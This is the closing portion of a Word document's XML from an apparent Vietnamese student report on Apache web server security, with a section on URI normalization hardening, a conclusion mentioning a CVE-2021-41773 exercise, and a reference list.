        <w:t>Bằng cách kiểm soát chặt chẽ hơn quá trình giải mã URI, chức năng này ngăn chặn các tấn công Path Traversal, nơi mà các kẻ tấn công cố gắng sử dụng các chuỗi ký tự đặc biệt để truy cập vào các thư mục hoặc tệp tin không được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046953A1" w14:textId="40F442C9" w:rsidR="00ED3E14" w:rsidRDefault="00D914D1" w:rsidP="00BD67BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cờ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F952C4">
        <w:t>AP_NORMALIZE_DROP_PARAMETERS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008779EB">
        <w:t>cờ này có thể được sử dụng để bỏ qua các tham số trong URL trong quá trình chuẩn hóa, điều này có thể dẫn đến các lỗ hổng bảo mật. Việc ngừng sử dụng cờ này đảm bảo rằng tất cả các tham số trong URI được xử lý một cách đúng đắn và không bị bỏ qua, tăng cường bảo mật tổng thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2F15B" w14:textId="77777777" w:rsidR="00ED3E14" w:rsidRDefault="00ED3E14">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78571CAE" w14:textId="04FE93A8" w:rsidR="00D914D1" w:rsidRDefault="00ED3E14" w:rsidP="00ED3E14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc171085533"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TỔNG KẾT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="1FF035E7" w14:textId="4587304C" w:rsidR="00ED3E14" w:rsidRDefault="00887878" w:rsidP="00BD67BD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong bối cảnh công nghệ thông tin ngày càng phát triển, việc bảo mật hệ thống web server trở thành một nhiệm vụ vô cùng quan trọng. Qua quá trình nghiên cứu và thực </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nghiệm </w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bài báo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> cáo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã đưa ra một cái nhìn tổng quan về các loại web server phổ biến, với trọng tâm là Apache, cùng những nguyên tắc cơ bản trong việc bảo mật chúng.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông qua bài báo cáo người đọc có thể hiểu được </w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>các khái niệm cơ bản về web server, từ các loại phổ biến như Apache, Nginx, đến Apache Tomcat và Lighttpd. Mỗi loại web server đều có những ưu và nhược điểm riêng, phù hợp với các mục đích sử dụng khác nhau.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nắm được khái niêm,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> các nguyên tắc bảo mật cơ bản cho web server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> và các biện pháp bảo mật tiên tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Việc áp dụng các nguyên tắc này không chỉ giúp bảo vệ hệ thống khỏi các mối đe dọa mà còn đảm bảo sự ổn định và hiệu suất của web server trong môi trường có số lượng người dùng khác nhau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E3E8F" w14:textId="559CA396" w:rsidR="00887878" w:rsidRDefault="004B640F" w:rsidP="00BD67BD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Bên cạnh đó, thông qua việc </w:t>
      </w:r>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> nghiên cứu về Apache đã chỉ ra rằng, mặc dù là một trong những web server phổ biến và được sử dụng rộng rãi, Apache cũng không tránh khỏi những lỗ hổng bảo mật.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Dựa vào các thông tin về bảo mật của Apache,các cách tấn công và lỗ hổng người đọc có những hiểu biết rõ hơn về các vấn đề bảo mật và cách phòng tránh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A89EE" w14:textId="1059E3F7" w:rsidR="004B640F" w:rsidRDefault="006F281D" w:rsidP="00BD67BD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Cuối cùng, phần thực nghiệm đã minh chứng cho các lý thuyết và kiến thức đã trình bày trong các chương trước đó. Việc khai thác lỗ hổng CVE-2021-41773 trên Apache HTTP Server không chỉ giúp làm rõ hơn các phương pháp bảo mật mà còn cung cấp những giải pháp cụ thể để tăng cường an ninh cho hệ thống</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81440C" w14:textId="147162FE" w:rsidR="006F281D" w:rsidRDefault="00AE709F" w:rsidP="00ED3E14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Bài báo cáo này đã đóng góp một phần nhỏ vào việc nâng cao nhận thức về bảo mật web server, đặc biệt là Apache. Những kiến thức và kinh nghiệm thu được từ bài báo cáo hy vọng sẽ hữu ích cho các nhà quản trị hệ thống, các chuyên gia bảo mật, cũng như những ai quan tâm đến lĩnh vực này</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956391B" w14:textId="3E2A481D" w:rsidR="00765DA4" w:rsidRDefault="004506FD" w:rsidP="00BD67BD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C714B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Trong tương lai, việc nghiên cứu và cập nhật liên tục các lỗ hổng mới và các biện pháp phòng chống sẽ tiếp tục là nhiệm vụ hàng đầu để đảm bảo an toàn cho các hệ thống web server trước các mối đe dọa ngày càng phức tạp và tinh vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771D46BD" w14:textId="77777777" w:rsidR="00765DA4" w:rsidRDefault="00765DA4">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD1F82B" w14:textId="1FF00790" w:rsidR="00AE709F" w:rsidRDefault="00765DA4" w:rsidP="00765DA4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc171085534"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="63D5EABB" w14:textId="0F2BB5E3" w:rsidR="00F21B70" w:rsidRPr="00F21B70" w:rsidRDefault="007C0A15" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:anchor="toc-content-0" w:history="1">
        <w:r w:rsidR="000200C7" w:rsidRPr="00B84CC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cmccloud.vn/tin-tuc/web-server-la-gi-103#toc-content-0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B6330C8" w14:textId="29906D92" w:rsidR="00F21B70" w:rsidRPr="00972451" w:rsidRDefault="007C0A15" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="000200C7" w:rsidRPr="00B84CC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://viettelidc.com.vn/tin-tuc/web-server-la-gi-cach-thuc-hoat-dong-va-luu-y-khi-su-dung-web-server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F9AAD89" w14:textId="0824FA28" w:rsidR="00972451" w:rsidRDefault="007C0A15" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="000200C7" w:rsidRPr="00B84CC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://viettelidc.com.vn/tin-tuc/web-server-la-gi-cach-thuc-hoat-dong-va-luu-y-khi-su-dung-web-server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44C44C10" w14:textId="045EF2A3" w:rsidR="000200C7" w:rsidRDefault="007C0A15" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="000200C7" w:rsidRPr="00B84CC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.feistyduck.com/library/apache-security/online/apachesc-CHP-1.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67DF63FA" w14:textId="6CC72C69" w:rsidR="000200C7" w:rsidRDefault="00AF4D34" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Giáo trình Cơ sở an toàn thông tin – Học viện Kỹ thuật Mật mã</w:t>
      </w:r>
      <w:r w:rsidR="0090413A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA2AFF" w14:textId="2FFFAC5C" w:rsidR="00141A69" w:rsidRPr="00386B9A" w:rsidRDefault="00386B9A" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ebook: Apache Security – 2009</w:t>
      </w:r>
      <w:r w:rsidR="0090413A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4031C8" w14:textId="7E8414C4" w:rsidR="00386B9A" w:rsidRPr="00386B9A" w:rsidRDefault="00386B9A" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ebook: Preventing Web Attacks with Apache – 2006</w:t>
      </w:r>
      <w:r w:rsidR="0090413A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0F0390" w14:textId="2C1DB11E" w:rsidR="00386B9A" w:rsidRPr="00FD4243" w:rsidRDefault="00FD4243" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4243">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Web Server Security on Open Source Environments</w:t>
      </w:r>
      <w:r w:rsidR="0090413A">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA24F41" w14:textId="0A20A6F1" w:rsidR="00FD4243" w:rsidRPr="000F0B5A" w:rsidRDefault="008B32DB" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B32DB">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Apache web server security with security hardening</w:t>
      </w:r>
      <w:r w:rsidR="0090413A">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B10BE69" w14:textId="77777777" w:rsidR="00971C08" w:rsidRDefault="000F0B5A" w:rsidP="00971C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0B5A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bản vá Apache 2.4.49:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73142439" w14:textId="4973077A" w:rsidR="000F0B5A" w:rsidRPr="00971C08" w:rsidRDefault="007C0A15" w:rsidP="00971C08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="0090413A" w:rsidRPr="00B84CC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          </w:rPr>
          <w:t>https://github.com/apache/httpd/commit/48b5dfd6968cb076537b605d368d5fd889ebae86</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E6A8553" w14:textId="729E3976" w:rsidR="00765DA4" w:rsidRPr="00765DA4" w:rsidRDefault="00765DA4" w:rsidP="00971C08">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00765DA4" w:rsidRPr="00765DA4" w:rsidSect="00897F3E">
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>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59BB2" w14:textId="77777777" w:rsidR="0089219E" w:rsidRDefault="0089219E" w:rsidP="00834D75">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D6A39B8" w14:textId="77777777" w:rsidR="0089219E" w:rsidRDefault="0089219E" w:rsidP="00834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716411"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="666AF7F4" w14:textId="1C6D65EC" w:rsidR="00EC0288" w:rsidRDefault="00EC0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5F4F5" w14:textId="53645227" w:rsidR="00834D75" w:rsidRDefault="00834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197CC" w14:textId="77777777" w:rsidR="0089219E" w:rsidRDefault="0089219E" w:rsidP="00834D75">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="405ABDB8" w14:textId="77777777" w:rsidR="0089219E" w:rsidRDefault="0089219E" w:rsidP="00834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7FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C262CB4"/>
    <w:lvl w:ilvl="0" w:tplc="35902CE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5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41ABE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="545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E4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1342B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13F885D4"/>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36893"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F46B578"/>
    <w:lvl w:ilvl="0" w:tplc="B7D61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09A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45F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D5843"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2DE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5840"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F865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5661B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D52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A5486"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9AE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50631"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2BFA7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60B92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9F60BE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D5C1A6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C948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B2BCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF1CB5DC"/>
    <w:lvl w:ilvl="0" w:tplc="8CBA5D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46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2C3F79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70FCE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21651"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF8075FC"/>
    <w:lvl w:ilvl="0" w:tplc="C42C75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D58A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D98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4353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32C8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800FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="115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37C20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2B2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2D94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="945A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31C7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED74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F8B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C66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E13AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E606F64"/>
    <w:lvl w:ilvl="0" w:tplc="109A6B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22D3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7F4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6524A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F269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D1A2D63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD1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A3A03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A08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A3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425519"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5EC2CFA"/>
    <w:lvl w:ilvl="0" w:tplc="B4B2C0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C26BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E22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B3FDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4E2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7606C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0668866"/>
    <w:lvl w:ilvl="0" w:tplc="F5CA0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21F4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF06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047AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F4C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31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A62309"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CC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62252"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDD0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53255"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C8645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911041163">
